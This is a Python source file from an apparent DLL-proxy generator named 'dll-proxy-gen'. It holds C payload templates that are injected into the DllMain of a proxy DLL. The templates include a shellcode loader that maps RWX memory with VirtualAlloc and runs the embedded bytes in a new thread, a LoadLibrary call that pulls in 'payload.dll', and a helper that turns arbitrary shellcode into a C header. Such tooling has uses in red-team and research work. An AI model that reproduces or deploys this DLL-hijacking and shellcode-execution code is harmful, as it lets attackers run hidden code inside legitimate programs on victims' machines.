"""
Payload templates injected into the generated DllMain.

Each payload is a snippet of C code placed inside the DLL_PROCESS_ATTACH
branch.  The snippet must be valid C (MSVC and MinGW compatible) and must
not include its own DllMain or DLL_PROCESS_ATTACH guard — those are provided
by the surrounding template.
"""

from __future__ import annotations

from enum import Enum
from typing import Optional


class PayloadKind(str, Enum):
    NONE       = "none"
    MESSAGEBOX = "messagebox"
    SHELLCODE  = "shellcode"
    LOADLIB    = "loadlib"


# ---------------------------------------------------------------------------
# Snippet registry
# ---------------------------------------------------------------------------

# ``{orig_stem}`` is substituted by the generator with the original DLL stem
# (e.g. ``_version_orig``).

_SNIPPETS: dict[PayloadKind, str] = {

    PayloadKind.NONE: "/* no payload */",

    PayloadKind.MESSAGEBOX: """\
    MessageBoxA(NULL,
                "DLL proxy loaded",
                "dll-proxy-gen",
                MB_OK | MB_ICONINFORMATION);\
""",

    # The shellcode stub allocates RWX memory, copies the shellcode, and
    # creates a thread.  The actual shellcode bytes are embedded as a C byte
    # array via an #include of a generated header.
    PayloadKind.SHELLCODE: """\
    /* shellcode loader — include generated shellcode.h for the sc[] array */
    #include "shellcode.h"
    {
        void *mem = VirtualAlloc(NULL, sizeof(sc),
                                 MEM_COMMIT | MEM_RESERVE,
                                 PAGE_EXECUTE_READWRITE);
        if (mem) {
            memcpy(mem, sc, sizeof(sc));
            HANDLE hThread = CreateThread(NULL, 0,
                                          (LPTHREAD_START_ROUTINE)mem,
                                          NULL, 0, NULL);
            if (hThread) CloseHandle(hThread);
        }
    }\
""",

    PayloadKind.LOADLIB: """\
    LoadLibraryA("payload.dll");\
""",
}


# ---------------------------------------------------------------------------
# Public API
# ---------------------------------------------------------------------------

def get_snippet(kind: PayloadKind, shellcode_path: Optional[str] = None) -> str:
    """
    Return the C snippet for *kind*.

    For :attr:`PayloadKind.SHELLCODE` a ``shellcode.h`` file is referenced;
    pass *shellcode_path* so callers can embed the bytes inline if desired
    (the generator handles that separately).
    """
    if kind not in _SNIPPETS:
        raise ValueError(f"Unknown payload kind: {kind!r}")
    return _SNIPPETS[kind]


def generate_shellcode_header(shellcode_bytes: bytes) -> str:
    """
    Render a ``shellcode.h`` C header that embeds *shellcode_bytes* as a
    static unsigned char array named ``sc``.
    """
    hex_bytes = ", ".join(f"0x{b:02x}" for b in shellcode_bytes)
    return (
        "/* auto-generated by dll-proxy-gen — do not edit */\n"
        "#pragma once\n"
        f"static unsigned char sc[] = {{\n    {hex_bytes}\n}};\n"
    )


def list_payloads() -> list[str]:
    """Return the names of all available payload kinds."""
    return [k.value for k in PayloadKind]
